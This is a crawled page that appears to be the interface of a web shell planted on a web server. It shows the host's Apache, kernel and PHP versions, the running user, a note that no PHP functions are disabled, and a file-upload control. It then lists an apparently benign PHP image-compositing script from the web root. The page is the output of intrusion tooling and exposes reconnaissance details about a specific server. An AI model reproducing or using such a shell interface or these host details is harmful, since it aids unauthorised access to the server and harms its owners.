( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/test2.php
<?php $gthumbs="v/uploads/gthumbs/01486dc478d8893c80a28dda915d92bccblessedbetty.png"; 
 $blank="js/blank.jpg";  
$brand = imagecreatefromjpeg($gthumbs);   
$brand_width = imagesx($brand);   
$brand_height = imagesy($brand);   
exit($brand_width);
$background = imagecreatefromjpeg($blank);   

$size = getimagesize($blank);   

$dest_x = 0;   

$dest_y =0;   

imagecopy($background, $brand, $dest_x, $dest_y, 0, 0, $brand_width, $brand_height); 
  
 
header('content-type: image/jpeg');  


imagejpeg($background);   

imagedestroy($background);   
imagedestroy($brand);
?>